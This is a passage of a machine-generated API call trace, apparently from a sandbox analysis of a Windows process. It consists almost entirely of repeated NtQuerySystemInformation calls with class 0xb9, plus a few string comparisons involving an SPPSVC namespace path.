SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee40, Length=0x28, ResultLength=0x0) [0240.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eec0, Length=0x28, ResultLength=0x0) [0240.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eec0, Length=0x28, ResultLength=0x0) [0240.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0240.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0240.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0240.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0240.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0240.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0240.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0240.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eff0, Length=0x28, ResultLength=0x0) [0240.660] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee40, Length=0x28, ResultLength=0x0) [0240.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eec0, Length=0x28, ResultLength=0x0) [0240.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eec0, Length=0x28, ResultLength=0x0) [0240.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0240.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0240.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0240.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0240.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0240.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0240.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0240.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f130, Length=0x40, ResultLength=0x0) [0240.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0240.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0240.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0240.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0240.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0240.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0240.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.674] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x28, ResultLength=0x0) [0240.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0240.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0240.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e980, Length=0x20, ResultLength=0x0) [0240.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e900, Length=0x20, ResultLength=0x0) [0240.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e900, Length=0x20, ResultLength=0x0) [0240.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e900, Length=0x20, ResultLength=0x0) [0240.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0240.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0240.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0240.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0240.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0240.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0240.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0240.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0240.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0240.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0240.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.688] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x28, ResultLength=0x0) [0240.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0240.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0240.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0240.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 